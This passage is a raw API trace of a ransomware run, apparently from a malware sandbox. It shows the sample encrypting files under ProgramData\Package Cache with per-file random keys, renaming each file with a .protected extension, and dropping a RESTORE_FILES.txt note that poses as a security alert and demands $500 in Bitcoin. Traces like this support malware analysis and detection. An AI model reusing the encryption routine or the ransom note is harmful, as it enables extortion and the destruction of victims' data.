(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0076.680] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.680] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0076.681] CloseHandle (hObject=0xb4) returned 1 [0076.681] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.681] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.681] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0076.682] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.682] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.682] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.683] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.683] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.683] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.683] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.683] CloseHandle (hObject=0xa4) returned 1 [0076.683] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Windows") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Program Files") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="Program Files (x86)") returned -1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="$Recycle.bin") returned 1 [0076.683] lstrcmpiW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="System Volume Information") returned -1 [0076.683] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 71 [0076.683] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2=".") returned 1 [0076.683] lstrcmpW (lpString1="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="..") returned 1 [0076.683] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*") returned 73 [0076.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.684] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.684] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\.") returned 73 [0076.684] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.684] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.684] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\..") returned 74 [0076.684] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.684] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.684] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.684] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.684] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.684] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.684] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.685] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0076.685] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm") returned 81 [0076.685] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0076.685] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.707] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2fe, lpOverlapped=0x0) returned 1 [0076.708] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.708] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.708] CloseHandle (hObject=0xb4) returned 1 [0076.708] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected") returned 91 [0076.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.protected")) returned 1 [0076.709] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="Windows") returned -1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="Program Files") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="Program Files (x86)") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="$Recycle.bin") returned 1 [0076.709] lstrcmpiW (lpString1="VC_redist.x64.exe", lpString2="System Volume Information") returned 1 [0076.709] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrIW (lpFirst="VC_redist.x64.exe", lpSrch=".protected") returned 0x0 [0076.709] lstrcmpW (lpString1="VC_redist.x64.exe", lpString2="RESTORE_FILES.txt") returned 1 [0076.709] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.709] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.709] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0076.709] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".txt") returned 0x0 [0076.709] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".rar") returned 0x0 [0076.709] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0076.709] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".zip") returned 0x0 [0076.709] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.715] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.716] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0076.716] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.716] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0076.724] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0076.724] CloseHandle (hObject=0xb4) returned 1 [0076.726] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.protected") returned 99 [0076.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.protected" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.protected")) returned 1 [0076.726] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0076.726] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0076.728] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RESTORE_FILES.txt") returned 89 [0076.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0076.794] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0076.794] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0076.795] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0076.795] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0076.795] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0076.795] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0076.795] CloseHandle (hObject=0xa4) returned 1 [0076.795] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Windows") returned -1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Program Files") returned -1 [0076.795] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="Program Files (x86)") returned -1 [0076.796] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="$Recycle.bin") returned 1 [0076.796] lstrcmpiW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="System Volume Information") returned -1 [0076.796] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 71 [0076.796] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2=".") returned 1 [0076.796] lstrcmpW (lpString1="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="..") returned 1 [0076.796] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*") returned 73 [0076.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0076.797] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.797] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.797] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.797] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\.") returned 73 [0076.797] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.797] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.798] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.798] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.798] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\..") returned 74 [0076.798] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.798] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.798] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0076.798] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files (x86)") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0076.799] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0076.799] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 81 [0076.799] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0076.799] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0076.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0076.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0076.799] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package 